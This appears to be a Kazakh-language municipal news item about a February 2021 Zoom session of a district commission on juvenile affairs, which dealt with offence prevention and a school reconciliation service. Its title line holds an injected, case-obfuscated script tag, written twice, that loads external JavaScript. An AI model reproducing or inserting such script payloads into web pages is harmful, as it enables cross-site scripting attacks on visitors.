17 февраля 2021 года по средствам платформ ZOOM<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

18.02.2021

2021 жылдың 17 ақпанында ZOOM платформасында комиссия төрағасының орынбасары Т.Р.Ахметжанов төрағалығымен  Есіл ауданы әкімдігі жанындағы кәмелетке толмағандар ісі және олардың құқығын қорғау бойынша аудандық комиссияның отырысы болды.

Мәжіліске қатысушылар: мектеп оқытушылары, Есіл ауданының полиция бөлімінде есепте тұрған кәмелетке толмағандар, мектепішілік бақылауда есепте тұрған кәмелетке толмағандар, сондай-ақ мектеп татуласу қызметінің мүшелері.

Күн тәртібіне сәйкес келесі мәселелер қаралды:

1.Кәмелетке толмағандардың арасында құқық бұзушылықтың алдын алу.

Баяндамашы: Есіл ауданының полиция бөлімі жергілікті полиция қызметінің бөлім басшысы, полиция майоры Зейнуллин Дамир Маратович.

2. Оқушылардың еріктілік негізінде құрылған мектептік татуласу қызметінің жұмысы.

Баяндамашылар: Аудандық білім бөлімінің құқық бұзушылықтың алдын алу бойынша әдіскері Шарабака Алена Петровна.

«С.Серіков ат. ОМ» КММ директордың тәрбие бойынша орынбасары Жолмагамбетова Шырын Муратқызы, 8 сынып оқушысы Волынкина Анжела.

Мәжіліс барысында ашық диалог алаңы орын алды. Мектеп оқушылары белсене араласты, қызықтырушы сұрақтарын қойып, баяндамашылармен әңгімеге араласты. Барлығы қатысқаны 65 оқушы.

 

Просмотров: 819


Пікір қосу



Деректерді қолтаңбаға қосу